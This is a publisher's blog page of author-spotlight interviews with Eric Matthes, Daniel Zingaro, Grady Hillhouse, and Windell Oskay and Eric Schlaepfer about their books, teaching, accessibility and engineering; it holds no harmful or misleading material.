No Starch Press's blog

Livin' the Dream with Python Crash Course Author Eric Matthes

 

Cover of Python Crash Course 3EThis Author Spotlight is on Python programmer/educator extraordinaire Eric Matthes, author of the international bestseller (now in its third edition) Python Crash Course. In the following Q&A, we discuss how reader feedback shaped the latest edition of his book, why he chose teaching over a career in physics, the importance of applying new programming concepts to your own projects, and what Eric learned about life—and coding—from riding across the U.S. on a bicycle (five times).

Eric Matthes has been writing computer programs since childhood. For over a decade, he was a high school science and math teacher, as well as a Python programming educator. He now lives in Alaska as a full-time author and informal Python evangelist, making appearances on podcasts and at events like PyCon, where he hopes to meet you in person.


No Starch Press (NSP): Almost eight years ago, you wrote what has become the most popular Python programming book in the world. Even with well over a million readers of your work, you’re known for replying to pretty much every fan who emails you. How has such a high level of audience feedback informed the second and third editions of Python Crash Course? 

Eric Matthes (EM): When people decide to read a book like Python Crash Course, they’re making a pretty significant commitment. I want to know that when people start the book, they can make it through everything that interests them. So, when someone writes to me about something that’s not working for them, I want to help them if at all possible. The teacher in me can’t help but answer people’s questions.

When I respond to questions, I look for patterns in what people are asking about. When the book first came out and I noticed multiple people asking about the same parts of the book, I’d look at those sections to see how I might revise them to avoid common points of confusion. That feedback from readers helped shape the second edition in particular. Writing the second edition gave me the chance to bring all the code in the book up to date, but also allowed me to clarify numerous sections that weren’t written as well as they could have been.

I also post resources online to address the kinds of things people ask about. For example, I posted a full set of solutions early on, because having solutions available is a huge help to independent learners. I’ve posted recommendations about what resources might be most useful to people after finishing Python Crash Course, and some thoughts about how to find your first programming job. The cheat sheets that accompany the book have been downloaded millions of times.

Overall, I spend about 10-20 hours a week answering questions and paying attention to updates in Python, and all the libraries that the projects depend on. For example, over the last two weeks, I wrote a fully updated test suite for all the code in the book, that makes it easier to test any section of the book against new versions of Python and other dependencies. It surprises a lot of people to hear about all this ongoing work. I think most people assume that once a book is published, the work is done. But this is what keeps Python Crash Course relevant and effective through each new printing, and each new edition. It’s mostly joyful work that puts me in touch with people from all over the world on a regular basis.

 

NSP: Would you share a little about how you got to where you are today? Specifically, how did you go from studying chemical engineering in college (with plans of becoming a particle physicist) to becoming a public-school teacher and, later, a full-time author?

EM: I had a really good high school chemistry class, so I started college with a major in chemical engineering. But after a semester I changed my major to physics—I just loved the quest to understand the universe at the most fundamental levels.

I loved math and science, but I also noticed how many of my peers hated those two subjects. I joined a volunteer tutoring program and noticed that most of the people who came to us for help enjoyed the same subjects I did—it was just the way they’d been taught that wasn’t working for them. That tutoring work really opened my eyes to the impact of good (and bad) teaching.

I wanted to be a particle physicist, but I didn’t want to be a student forever. I tried teaching and found that the challenge of trying to reach every student in a class was as satisfying as hard science. I never really looked back from teaching. I taught middle school math and science for seven years in New York City and then transitioned to high school when I moved to Alaska.

My father was a software engineer in the ’70s and ’80s, so I learned the basics of programming as a kid. (That was a time when people were just starting to have computers in their homes.) I was a hobbyist programmer all my life, and I’d teach intro programming classes whenever I could. In the early 2010s, I was looking for a book I could give to my more motivated students so they could work at their own pace. I was frustrated to find, however, that every book available back then was either aimed at little kids or made too many assumptions about what people already knew.

I decided to write a book that reflected the way I teach: a focus on just enough fundamentals to start doing meaningful projects. I wrote Python Crash Course for “anyone old enough to not want a kids’ book.” It has met that goal beyond my wildest hopes. When the book first came out, I got a handwritten letter from a 10-year-old who said thank you for writing a book they could learn so easily from. I regularly get emails from people in their 70s and 80s who are finally learning programming to satisfy their curiosity or to keep their minds active. And I hear from everyone in between: high school students, undergrad and graduate students, and a whole bunch of people who are already working but are looking to make a career change. These emails, and conversations at conferences, are the highlight of my writing career.

 

NSP: Speaking of teaching, your early career in the field is what led to a chance encounter with No Starch Press's founder, Bill Pollock, following a lightning talk you gave at PyCon in 2013 about improving education by taking ideas from the programming world. (Tough crowd!) How did your appearance at the conference result in a publishing deal, and had you been thinking about writing a book at that point in your life?

EM: I first went to PyCon in 2012 because I wanted to do something meaningful with the programming skills I’d been informally building all my life. I was starting to build some tools that would help students navigate school better, and help teachers focus on teaching well. For example, I wrote a program that ingested students’ text-based transcripts, which were really hard to read, and generated a visual transcript for each student. You could look at one of these transcripts and in 30 seconds see what a student’s strengths and weaknesses were, and what they needed to focus on in order to graduate. That project didn’t just save time—it changed the nature of many conferences with students and their families. Instead of focusing on the frustrating process of trying to decipher a transcript, the focus was on celebrating successes and how to meet ongoing needs.

I gave a lightning talk in 2013 about how we could bring the well-established concept of openness in programming into the education world, in a way that goes beyond free software. Bill was in the audience, and he’d been having his own frustrations with the school system at that time. He said something along the lines of, “I like what you have to say about education. If you ever want to write a book, feel free to submit a proposal.” Some early No Starch books had been really influential in my life, so that invitation was compelling. I got my start on Linux by reading Ubuntu for Non-Geeks.

I didn’t really want to write a book, because I was focused on those educational infrastructure projects. But when I got back from the conference, I saw a handwritten poster I had put up in my classroom. It was titled “What’s the least you need to know about programming in order to work on your own projects?” I had listed out the most fundamental concepts of programming, along with three suggestions for projects: a video game, a data visualization project, and a web app. I realized that the poster was the table of contents of the book I wished I could teach from, and I basically turned that poster into a book proposal.

I naively thought I could write the book during the summer and edit it during the following school year. That turned into two and a half years of early mornings and late nights! But it was very much worthwhile; Python Crash Course has reached a global audience that I could hardly dream of back then. I kept teaching full-time until 2019. But I couldn’t continue to teach well and write well, so I left the classroom to focus full-time on writing and programming.

 

NSP: While we’re on the subject of conferences, you encourage your fans to go to events like PyCon or local coding meetups—that is, places where they can benefit from taking part in some sort of Pythonista community. Why do you believe it’s important for programmers (of every skill level) to step away from their monitor and go meet people?

EM: As a programmer, especially if you’re new to the field, it’s so easy to get stuck in your own head. It’s tempting to keep telling yourself you’re not good enough yet, that when you just learn a little more you’ll be ready to meet others and talk about programming. But when you step into a Python space—a meetup, a conference, an organized online event—you’ll almost always meet people you have something in common with.

You’ll definitely meet people who know more about Python than you do. But you’ll also probably meet people who are even newer to the field than you are. You’ll find people who are working on problems you’re interested in, and you’ll be inspired in ways you just can’t predict.

Some of what you hear will go over your head, but that’s quite fine. The concepts you hear about but don’t understand yet will be more familiar when you come across them later in your own work. And they won’t be dry concepts then—you’ll have a face you can connect to that topic. 

There’s also a fair chance you’ll make some lifelong friends, especially if you end up staying in the Python community for a while.

 

NSP: Given that PCC has been a bestseller for the better part of a decade, you probably come across people who read the book years ago and are now really advanced and/or professional Python programmers. Got any tips on how to continue making progress for those who only recently finished the book? Put another way: How does someone go from beginner to expert programmer, and is that even necessary in order to have success in the field of programming?

EM: That happened much faster than I thought it would! I remember talking to someone at a booth at the second conference after the book came out. They were explaining something technical about what their company does, and halfway through they realized who I was. They stopped what they were saying to share how much Python Crash Course had helped them get started in programming. Then they continued their explanation of an area of programming I hadn’t used much and didn’t fully understand. As an author, that was a very satisfying experience!

In the early days of Python, it was pretty reasonable to aim for mastery of the entire language. It wasn’t that big, and back then the community was a lot smaller as well. These days, Python is huge; it would be really hard to know every part of the language in depth. There are plenty of Python maintainers who know one part of the language well, but who wouldn’t consider themselves an expert in other areas. It’s just too big and touches too many specialized areas.

We all know what a beginner is because it’s relatively easy to define. But there’s no clear definition of “intermediate” or “advanced.” I would advise people to learn one language well enough that you can use it to solve meaningful, real-world problems without having to follow a step-by-step tutorial. That doesn’t mean you need to be able to write code from memory. It’s perfectly fine to look back at the tutorials and resources you’ve learned from as you’re working on your own projects.

The best advice I can give once you’ve learned the basics is to keep learning fundamental concepts, but make sure you’re applying those concepts in a variety of real-world projects. There are a lot of concepts in programming that you can’t fully make sense of until you’ve had the chance to apply them in a variety of contexts

 

NSP: Let’s talk about your passion for projects, then. Python Crash Course is peppered with a number of them—including a Space Invaders-–style video game—and these endeavors definitely contribute to the book’s effectiveness. Would you explain your philosophy that programmers should always have a project in mind? Bonus question: Care to share any cool projects that you are working on right now?

EM: Nobody really learns programming just to write lines of code. The code we write is only meaningful if it actually does something we (or someone else) cares about. If you have a project you’re yearning to build, you’re almost certainly going to be a more active, engaged learner. Every time a new concept comes up, you’ll ask yourself how that concept might help you implement your project. This pushes you to think more deeply about each new concept and try using it in different ways, until you start to internalize that concept.

At the same time, you probably shouldn’t just focus on one large project. It’s helpful to take on some smaller projects that you can complete, and practice the art of “finishing” a project. No codebase is perfect, so learning to recognize when a project is “good enough” is a tremendously valuable skill.

I always have a number of projects going on. I write a weekly newsletter called Mostly Python, and it consists of individual, one-off posts and series about specific topics. I’m working on a program that will convert these series into mini-ebooks. I’m working on django-simple-deploy, a project that automates configuration and deployment for Django projects. I’m slowly learning piano, and I had a hard time learning all the notes of the grand staff well enough to focus on actually playing music. I made an old-school JavaScript site that facilitates learning the notes, and after using it for two weeks, I’m now the fastest student at naming all the notes. (That really means I’m faster than a bunch of fifth graders, but it still feels good.) I’m going to polish that a bit more and then share it more widely.

 

NSP: Last question. A surprising detail about your life is that you’ve bicycled across the US [checks notes] five times—in fact, you quit your job at one point and lived on a bike for an entire year! Are there any lessons you learned during those hundreds (thousands?) of hours of pedaling that can be applied to the world of Python programming?

EM: Yes, it was thousands of hours of pedaling!

When I was in my 20s and had a few years of teaching behind me, everyone was focused on getting master’s degrees. I just wanted to live outside during the summer, so I biked across the US for two summers in a row. I rode across the northern states one summer and then took a southern route the next summer. Those were such good experiences, I quit my job so I could live outside for a full year. I rode from Seattle to Maine, down to Florida, over to California, and up to Alaska. I had a conviction that I’d learn more from that kind of journey than I would from getting a master’s degree, and looking back, it was definitely the right choice for me.

One thing I took away from that trip was a deep reserve of calm from having faced everything that a year of living outside brings: beautiful sunny days in wild places, sleety mountain passes, sleeping in a tent for weeks at a time with bears, and so much more. Another big life lesson was a better understanding of all the different ways people live their lives. When you travel alone for an extended period without an engine, people open up in a different way. This was before social media, smartphones, Google Maps, and photo-sharing sites. I stopped a lot to ask directions, and just talk to people on the side of the road. Mostly, I just listened—people want to tell you about the place they live, and many people want to share their life story when you’re outside and don’t have a schedule. People would say, “I wish I could just take off and live on a bike...” and then they’d open up and tell really honest stories about their lives. I think that happened a lot because people knew I was just passing through, and they’d never see me again.

I learned empathy from listening to so many different people. When I write code, I think about the people who will use what I’m making, and I consider who might be negatively impacted by whatever I contribute to. I enjoy time in front of a computer more because of the time I’ve spent far away from a computer. When I deal with stressful bugs and crashes, I remind myself, At least I’m not facing a bear alone on the side of a gravel road in the far north of British Columbia right now.

I believe most programmers benefit from having nontechnical hobbies. Anything you find meaning in away from a computer helps keep your technical work in perspective. Keeping things in perspective is really helpful in a yearslong technical career.

Finishing that trip made it easier to write a book because I had a sense of how to bring a long-term project to completion. In some sense, a 14,000-mile bike trip is nothing more than a whole bunch of individual pedal strokes. When I feel like I’ll never get to the end of a long project, I often think back to hard days of riding and remind myself that every step forward is meaningful. That’s more than just a passing thought, though. It brings back the feeling of living outside on a daily basis. I miss those days, but I’ll carry them with me for the rest of my life.

For anyone interested in hearing more about those adventures, I wrote a book about the trip a while back. It’s kind of funny to be the author of one book that’s sold over a million copies, and another that’s sold about a hundred copies. But I wrote that book more to solidify the memories than to reach a wide audience. 

Solving Problems with Algorithms-Ace Dan Zingaro

 

Cover of Algorithmic Thinking, 2nd EditionOur latest Author Spotlight is on computer-science whiz Daniel Zingaro, author of Algorithmic Thinking as well as its soon-to-be published second edition, and Learn to Code by Solving Problems (2021). In the following Q&A, we talk with Dan about his favorite childhood computing memory, how he went from nearly dropping out of CS classes at university to teaching them, the accessibility tools that helped him become a programmer despite being severely visually impaired, and why fellow educators should feel empowered to write books about the subjects they teach.

Daniel Zingaro, PhD, is an award-winning associate professor of Mathematical and Computational Sciences at the University of Toronto Mississauga, where he is well-known for his uniquely interactive approach to teaching, and internationally recognized for his expertise in Active Learning. In addition to writing, educating, and researching, Zingaro is one of our go-to technical editors, whose work includes Python for Kids, 2nd Edition (2022), Data Structures the Fun Way (2022), Python for Data Science (2022), and Python One-Liners (2020).


No Starch Press: Congratulations on the second edition of Algorithmic Thinking! One of the things that really makes it unique is your show-not-tell approach to teaching algorithms, where you present the problem first and then guide the reader toward finding the fastest, cleverest solution. It can’t be a coincidence that you’re also an award-winning college professor known for your “active learning” method. Did your experience as an educator influence the way you wrote the book?

 
Daniel Zingaro: Oh, definitely. I've learned so much about teaching from my students, and I always try to incorporate as much of that as I can into my writing. The reason I flipped the book to be "problem first, material second," rather than the opposite, is because many people are not motivated to learn abstract stuff without understanding why it might be useful or matter to them. If I can have a reader read a description of a problem and be like, "Yo! I don't know how to solve this thing," then I feel like the real learning can begin.
 
I've also tried to make the book inviting to students who might otherwise not feel welcome. For example, I didn't put proofs or theorems or much math in there, because I know what that stuff does to many students: "Theorem 1: let x, y, and z be ... oh hey look, a new YouTube video!" So why force students to learn in a specific way? Because we happened to learn that way? Because that's the only way to teach it? Those reasons aren't acceptable to me. Students provide constraints on how they want to learn. If we professors are all we think we're cracked up to be, let's rise to this challenge and teach under those constraints. There's no right way to teach. If someone (like, literally, I mean one person) learns from it, then it is right.

 
NSP: It’s hard to believe that you twice came close to dropping out of Computer Science while attending university — and nearly failed a course that you later went on to teach. But it must be true because you disclose this personal trivia to your students. Why is it important for you to be so open about your past struggles?
 
DZ: It's true! I really need to dig out my old transcript and post it online for students so they can see my nearly failed grade. It's very important to me to share these low points with students because many students experience low points of their own. The way I connect with the world is through humor and making personal connections. If there's anything I can share with people that helps me make these connections, then I will do it. 
 
My waffling on whether to drop out of Computer Science, and suffering some poor grades, offer ways for me to make these connections. How funny, right? A professor that almost failed a course? It's really too bad that it's funny – I mean, the only reason it's funny is because it's so rare. With the poor grades and other challenges, I'm fortunate to have still gotten here. But I did, somehow. I figure that maybe my struggles can somehow help someone else with their own struggles.

 
NSP: Let’s talk about accessible computing for a moment. A lot of our readers may be surprised to learn that you’ve been blind your entire life, which would put you in the very small category of visually impaired students who successfully learn programming and earn advanced degrees in the subject. What adaptive tools helped you overcome the challenges you faced? And, how has the level of accessibility in computing evolved?
 
DZ: Yep – that's why my books don't have any extraneous pictures. Or cute sidebars. Or cute icons.
 
The computing tools for accessibility these days are making huge advances. I use the free NVDA screen-reader to do all of my computing tasks. But looking back, the tools only helped me because my parents gave me the opportunity for the tools to help me. My parents are in the Acknowledgements section of my book because, without them, there is no book, there is no career, there is no who-knows-what-else. If you have a disability or are otherwise being excluded, then (if it's safe to do so): advocate for yourself. That's what I learned from them. Could I have advocated for myself otherwise? Could I have advocated if I didn't feel safe in Canada doing so? Probably not. That's scary. I may have worked hard, but the world gave me the opportunity for my work to mean something. How many people work even harder and never have the opportunity to benefit? That's a tragedy.
 
I try to use one of my lectures every year to show my students the tools that I use to teach. They're computer scientists and are going to be building tools that all of us will use in the future, so I like to show them how much accessibility matters, for real, to a real person. And I always start with a 10-minute discussion of how I hope they interpret what I'm about to show them. It seems natural for them to hear my super-fast screen-reader speech, or the handheld device I use to read Braille, and be like, "holy cow, Dan is epic!" But I'm not. The tools are epic. Actually, wait; that's not quite it. We're all epic. Many people can read or write or do amazing things. And, yeah, the way that most (non-visually impaired) people do it is different than how I do it – but at the end of the day, the technology exists and makes it so that I can do it, too.
 
Also, a big shout-out to everyone who cares about accessibility and/or works to make software or processes or the world in general more accessible. We need people (including ourselves) to encourage us, and we need the accessibility tools to realize that encouragement.

 
NSP: Another thing our readers might not know about you is that you're the technical editor behind some of our bestselling books, including Data Structures the Fun Way and the new edition of Python for Kids. Since you've already made a name for yourself as a writer, what drew you to the unsung-hero role of technical editing, and can you tell us a little about what you actually do in that regard?
 
DZ: I find technical editing to be quite fun. I find learning fun, and editing books helps me sharpen what I know about a particular topic, so it's kind of fun by default. I also welcome the opportunity to help authors produce even better books. It's the best when there's an author doing great work, and I can in some small way help that author even further. Sometimes I'll be editing a book and think, "dang, this is so good! Why couldn't I have written this?" But, the reason is that I couldn't write their book even if I tried. The author has a particular voice, a particular expertise. Editing permits me to revel in that expertise, to just be grateful for the fact that here we have another author who has the ability and opportunity and life circumstances to share what they know.
 
What I do when editing is annoy the author with every tiny improvement/possible improvement that I can think of. (No, really – ask them.) I check all of the code and text, of course, but that's not my favorite part. My favorite part is using what I know about teaching to offer suggestions where I suspect learners may get particularly stuck. A lot of the topics covered in these books are ones I haven't taught before, and even if I have, I know only a small amount about where and why learners do or do not make progress. The challenge really never goes away, that's for sure, but I welcome any opportunity to try my best to be helpful given what I do know.
 
 
NSP: Like many of our authors, you’ve been into programming since you were young. What’s your earliest memory of enjoying computing, and when did it go from being a hobby to a career path?
 
DZ: One of my earliest computing memories also happens to be one of my favorites. My family was trying to get me a computer loaned to us with screen-reading technology on it (as it was expensive in those days and involved several interacting software and hardware devices). We were at an assessment center to look at some models, and my dad and some employees were talking about computery stuff that I didn't understand. Honestly, all I wanted to do was play a computer game or type something funny on the screen, but the adults just kept talking. Finally they stopped and wanted me to try out three different types of computers to see which one I could best work with. I started with the first computer, typing a little story. And then I managed to do what turned out to be the best thing ever: I froze the machine. But not just a normal freeze, a hilarious freeze where the screen-reader thing kept repeating the same “ah ah ah” syllable again and again, with no way to stop it. All of the fancy computery people were trying fancy things but simply could not make it stop. I was doing my absolute best not to laugh, because I desperately wanted the chance to take home a computer that day. Eventually they gave up and had to completely shut it down by flicking the power switch. Once they did that, I just couldn't hold it in anymore and burst out laughing (while also realizing I probably blew my chance at getting them to give me a PC). But, no! It turns out that they were actually impressed that I had successfully frozen the computer, and agreed to loan it to us on the spot. Looking back, I didn't do anything impressive – probably just pressed a bunch of keys at the same time or some such nonsense.
 
Presently, I'd say I'm more of a teacher-person than a computer-person. Computing happens to be the thing that I can apparently teach best, but I get my true motivation from teaching in and of itself. I often catch myself learning something new and then immediately thinking about how I might teach it. Or I'll solve a computing problem and then be thinking about which chapter of a book it might serve as an example in.
 
 
NSP: You’ve been a professor at UT-Mississauga for nearly a decade now. What’s the most significant thing you’ve discovered about teaching Computer Science in all that time?
 
DZ: The most significant thing I've learned is that every book is total junk for a subset of students. For any one of the textbooks I use – say, a classic CS book – there is a subset of students for whom that book just doesn't work. In fact, my happiest teaching days usually involve a student telling me that my book isn't working for them. Now, it might not be their happiest day, because then I try to drag them into a two-hour conversation about why it isn’t working. But I really do want to learn from them and try to do better. And they know how passionate I am about learning, so I don't feel too bad about that!

 
NSP: Much like sky-diving, writing a book takes a leap of faith — and you’ve done both. What advice can you offer to fellow CS educators who have thought about becoming an author but are scared to make the jump?
 
DZ: I'm married now, and I'm pretty sure I signed some wedding papers that make me not allowed to skydive anymore. (I'm guessing that book-writing is still okay, though.)
 
I think CS educators are in a unique position to write books that teach. They have so much experience in the classroom, and I myself was surprised how much of it I was able to carry over into my writing. I'm not an algorithms researcher. I don't know a whole lot more about algorithms than what I put into the book. (You'll know that I learned new algorithm stuff if you ever see a third edition of Algorithmic Thinking!) But, you know what? I think not being an algorithms researcher was a blessing for this book. I'm not so far removed from remembering how challenging it was for me to learn these concepts the first time. And the approaches I know best are the general (not specialized) ones that are applicable to a wide variety of problems that programmers might run into in the wild. I hope readers can see in every chapter how excited I am to learn even more about algorithms, and I hope that excitement helps fuel their own excitement.
 
So, say you teach a web programming course. Or an architecture course. You've tuned it. Your students respond well. Who cares if you're not the foremost expert on web programming or architecture? You're a teacher who knows how to connect with students and, as such, your book is valuable.
 

Ride-Along with Engineer Grady Hillhouse, the Ultimate Road Trip Buddy

 

Cover of Engineering in Plain SightNew year, new spotlight—and this one shines on civil engineer and YouTube star Grady Hillhouse. His first book, Engineering in Plain Sight, was released this past Fall to critical acclaim. In the following Q&A, we talk with Grady about how he went from civil engineer to full-time video producer with over 3 million subscribers (hint: woodworking), why all he needed to know about science communication he learned in kindergarten, the importance of average citizens understanding how things work, and the joy of "infrastructure spotting" on the road.

 

Grady Hillhouse is a civil engineer and science communicator widely known for his educational video series "Practical Engineering," currently one of the largest engineering channels on YouTube, with millions of views each month. His videos, which focus on infrastructure and the human-made environment, have garnered media attention from around the world and been featured on the Science Channel, Discovery Channel, and in many publications. Before producing videos full- time, Grady worked as an engineering consultant, focusing primarily on dams and hydraulic structures. He holds degrees from Texas State University and Texas A&M University.


No Starch Press: You got your bachelor’s degree in geography, then later earned a master’s degree in civil engineering, and spent nearly a decade working in the field on infrastructure projects. How did you go from that path to becoming a full-time YouTube sensation?

Grady Hillhouse: Making YouTube videos started as a hobby for me when I was given some woodworking tools. I wanted to learn to use them, and of course, I went to YouTube to watch tutorials. What I found was a community of woodworkers producing videos of their projects and sharing with each other. I was so fascinated that YouTube could be used in a social way (I had only thought of it as a search engine for videos), and I wanted to be a part of the community. Over time, I started including some engineering into my woodworking videos. Eventually I realized that I really enjoy sharing my passion and experience in engineering to others, and I decided to focus on that topic. 
 
I continued making videos about engineering and infrastructure in my free time, and worked to make them better and better. When my first son was born, all that free time I had to make videos vanished. I was forced to make a choice between sticking with my career in engineering or finding a way to support my family with my hobby. Ultimately, I decided I could have a bigger impact on the world producing videos (and writing a book). If everything comes crashing down, I still have my engineering license to fall back on!

 
NSP: You clearly have a genuine passion for the built environment—it shines through in every one of your YouTube videos and all throughout the new book. So, chicken or the egg: Did this interest spring from your graduate studies and (initial) profession, or did your fervor for infrastructure influence your academic and career pursuits?
 
GH: I have been interested in how things work since I was a kid, but my passion for infrastructure really didn’t come until college. My undergraduate classes in water resources are really what led me into civil engineering. My engineering classes are where my eyes were opened to all the “hidden in plain sight” details of the built environment. Every class was like turning on a lamp to illuminate some innocuous part of the constructed environment that I had never noticed before, and I just never stopped paying attention since.

 
NSP: Like Bill Nye and Neil deGrasse Tyson, you’re known as a “science communicator.” But one thing engineers are not typically known for is the ability to explain complex technical processes in laypeople's terms. What’s your trick for translating “engineer speak” into engaging, accessible content without dumbing it down?
 
GH: My wife was a kindergarten teacher when I first started working as an engineer, and I once got invited to her elementary school to give a presentation about civil engineering. I built a model that shows the different purposes of a dam and reservoir. The first presentation I gave went really well. It seemed like the kids were interested in what I had to say, but I noticed that I was getting questions from teachers. So the next few classes, I started paying attention to the teachers and administrators in the back as I went through my presentation, and was surprised at how attentive they were. 
 
It slowly kind of dawned on me over the course of these five or six presentations I gave that, when I talked about my career to adults, I was usually trying to make myself sound smart and dignified, avoid dumbing it down, or accidentally patronizing someone. But, when I was talking to students, I didn’t have those pretenses. 
 
I’ve basically spent the past 10 years reminding myself that the average adult knows just as much about civil engineering as your average kindergartner. Half of civil engineers just think about dirt and rock all day. We have no good reason to pretend to be so dignified. It’s not just how you keep the interest of a bunch of kindergartners for 15 minutes; it’s how you reach an audience on their level.

 
NSP: Your book is an “illustrated field guide to the constructed environment” and, indeed, the simple yet incredibly detailed illustrations of every structure being explained on the page really highlight why they should be seen as “monuments to the solutions to hundreds of practical engineering problems,” as you put it. How did these awesome little artistic renderings come about?
 
GH: The idea for the book was very much rooted in the idea that there are all kinds of structures and devices that we see out in the world but can’t identify, and really, can’t even do an internet search for because they are quite difficult to describe. So, each section focuses on the parts of infrastructure that you can see. Just like using a field guide to birds or plants or rocks, as you slowly start to learn the names and purposes of what you can observe, it makes being outside a lot more fun. It gives you something to pay attention to on walks or road trips.
 
When I was a kid, one of my favorite things to do while bored was to open an encyclopedia up to a random page and read about what I found. I really wanted readers to use Engineering In Plain Sight the same way where you can just open to any page and find something interesting. I worked really hard with my graphics team at MUTI to make each one of the illustrations as rich and full of detail as possible, and I’m so proud of what we came up with together.

 
NSP: Similar to your YouTube channel, “Practical Engineering,” has gotten an amazing response from a wide-ranging audience. And I think it’s fair to say that the majority of people who pre-ordered the book or put it on their holiday wish-list were not, in fact, engineers (though it's been popular in engineering circles, too). Why do you think the rest of us are so captivated by getting an inside look at how cell towers, highways, levees—the built world—actually works?
 
GH: It’s hard to say for sure! But, I suspect part of it is that these structures really are in plain sight. Learning something new about some seemingly mundane part of your immediate surroundings is magical. My favorite comment to get on a video is, “I didn’t even realize I was curious about this until you asked the question.”

 
NSP: A few months ago, you did a “Practical Engineering” video on a massive—and massively troubled—South Texas bridge project. For those who live in the area, like yourself, it’s a local issue. But your “Harbor Bridge” episode now has over 1.6 million views and nearly 3,000 comments. Do you think that helping people understand the infrastructure in their community (and how it can fail) is a way to strengthen civic engagement through a more informed citizenry?
 
GH: I really do believe we need to understand our connection to the constructed environment to care for it and to invest in it, which means we need to know at least a little bit about how it works. Our lives rely on many types of infrastructure: roads, bridges, dams, sewers, pipelines, retaining walls, water towers—these structures form the basic pillars of modern society. 
 
And the decisions we make about infrastructure —where to build it, how to pay for it, and when we maintain it—have consequences that affect everyone in powerful and fundamental ways. So, we need everyone to be involved in those decisions, not just engineers and bureaucrats. We all carry some responsibility for how the world is built around us. Investment in infrastructure requires that we value and appreciate it first, and so that’s what I try to do with my videos and the book.

 
NSP: In addition to opening everyone’s eyes to the feats of infrastructure that surround and support our modern lives, you’ve also introduced us to the oddly joyful pastime of “infrastructure spotting”—something you apparently still get a kick out of. In fact, you note that your “entire life is essentially a treasure hunt for all the interesting little details of the constructed world.” (I bet you’re fun on road trips!) What fuels your ongoing enthusiasm and sense of wonder for the built environment, given you literally wrote the book on the subject?

GH: In any city I visit, I want to learn where they get their water, how their electrical grid is set up, how they manage drainage and flooding and transit and wastewater, et cetera. There is so much variety in how we solve difficult challenges through infrastructure. Plus, we’re always building new things and using new technologies. So, there’s almost always something new to see wherever you go!  

 

Cutting It Up with Open Circuits' Windell Oskay & Eric Schlaepfer

 

Aglow in our Author Spotlight series this month are the daring duo behind Open Circuits: The Inner Beauty of Electronic Components—Windell Oskay and Eric Schlaepfer. Their book is a truly unique photographic exploration of the astonishing design hiding in everyday electronics, and it's as awesome as it sounds. In the following Q&A, we talk with Eric and Windell about how this project came about, the ins and outs of the hardware disassembly and macro-photography feats it took to make the book, the surprises—both good and bad—that they encountered along the way, and the many challenges of cutting a cathode ray tube in two.

Eric SchlaepferOpen CircuitsWindell Oskay

Eric is a hardware engineer at Google, and runs the popular Twitter account @TubeTimeUS, where he posts cross-section photos, discusses retrocomputing and reverse engineering, and investigates engineering accidents. His better-known projects are the MOnSter 6502 (the world’s largest 6502 microprocessor, made out of individual transistors) and the Snark Barker (a retro recreation of the famous Sound Blaster sound card).

Windell is the co-founder of Evil Mad Scientist Laboratories, where he designs robots and produces DIY and OS hardware "for art, education, and world domination.” A longtime photographer, he holds a B.A. in Physics and Mathematics from Lake Forest College and a Ph.D. in Physics from the University of Texas at Austin. Besides Open Circuits, he's author of The Annotated Build-It-Yourself Science Laboratory (Maker Media, 2015).


No Starch Press: First of all, congratulations on all the hard work paying off. The response to your book has been incredible. Considering how popular cross-section pictures were when I was a kid, I guess it’s not too surprising. People still love peeking into things full of hidden complexities! But the books I remember were mostly just intricate drawings—for Open Circuits, you actually photographed real stuff that you cut in half. What inspired this project? Did you intend to add a whole new dimension to the “cutaway” genre?

Eric Schlaepfer: I grew up fascinated by cross sections and cutaways. I’m sure that influenced this book, but it’s not exactly what inspired me. It was a broken piece of equipment, and the problem was one of the electrical components (a tantalum capacitor similar to the one on page 40). I sanded it in half to see if I could figure out how it failed, tweeted a photo, and folks really enjoyed it. So I started cutting other parts in half, and that led to the book.

Windell Oskay: I’ve always been interested in how things are made, in addition to how they work and what’s inside them. One of the really remarkable things about physically cutting things is that you get to see so many features that are maybe incidental to the function of the device, but are signatures of the processes that went into making it. Each part tells a story. And, often, we’re not even saying anything about them. Those little stories are left for the readers to discover.

 

NSP: The two of you have professionally intersected over the years in Silicon Valley, and have worked together on some design projects for Evil Mad Scientist Laboratories. But who roped whom into this book idea? What compelled you to collaborate at such a level?

ES: We’ve worked together on a number of other projects, such as the Three Fives discrete 555 timer kit, as well as the world’s largest 6502 microprocessor—the MOnSter 6502. Windell had seen my photos on Twitter, and we started talking about how to turn it into a book. I don’t remember all the details but it was a very natural thing.

WO: We’ve had a number of fruitful collaborations. In addition to those that Eric mentioned, we also designed an educational project, “Uncovering the Silicon,” that we presented at Maker Faire (along with Ken Shirriff, our technical reviewer for Open Circuits, and John McMaster, who prepared some subjects for photography). In that project, we placed very simple integrated circuits under a microscope and showed how they worked by tracing their individual parts. There’s a sense in which our book is a successor to that project—we’re letting people look at things up close, and then talking through how they work. But, I think that there was actually a moment when I roped Eric into the book idea after seeing his early cross-section photos.

 

NSP: What was the most challenging aspect of putting this book together?

ES: There were many challenges. For me, the most difficult challenge was preparing the samples—it took a really long time to prepare each one, taking care to create a polished section with no scratches or blemishes, and being careful to remove every speck of dust.

WO: At one point we realized that we would have to cull the weakest subjects from our draft. We ended up deleting about a dozen—some quite interesting and beautiful—along with their descriptive text. The book is stronger as a whole because we did so, but it really stung at the time. Fine-tuning our text was also difficult in places. For a number of subjects, we only had a few sentences in which to flesh out subtle concepts clearly, to an audience composed of both laypeople and engineers.

 

NSP: How did you divide up all of the labor that the book entailed? I mean, you had to find hundreds of tiny electronic components, carefully cut them in half, photograph them, write the accompanying text for each page—the list goes on and on!

ES: Windell took on the photography and some of the sample preparation, introducing me to some more professional tools that I hadn’t used before. We spent time searching the local electronics surplus store for potential subjects, and I made a lot of exploratory cuts to see if a particular component would be good enough for the book. I’d say the writing was a 50/50 split—we spent so much time writing and editing over video-chat that I wouldn’t be able to point to any sentence and definitively say 'I wrote this.'

WO: In addition to the bulk of the cutting and sample preparation, Eric also drew the rough drafts of all of the illustrations and wrote the initial drafts of some of the most challenging subjects to describe. I took the photographs, fine-tuned the illustrations, and designed the initial page layout so that we could understand how much text could be paired with each photographic subject. And as Eric said, we worked together closely through all of the writing and editorial choices.

 

NSP: Eric—what was the hardest thing to cross-section, and how did you eventually make it work?

ES: The most challenging was the cathode ray tube (page 186). Windell had the idea to cut it on the slow-speed saw so we could remove the electron gun. I sectioned the glass envelope and the electron gun separately—each of those took several hours to wet sand. The parts were simply too fragile to section any other way. Cleaning the sectioned electron gun was difficult because of the small magnet inside, which vacuumed up the debris created during sanding.

 

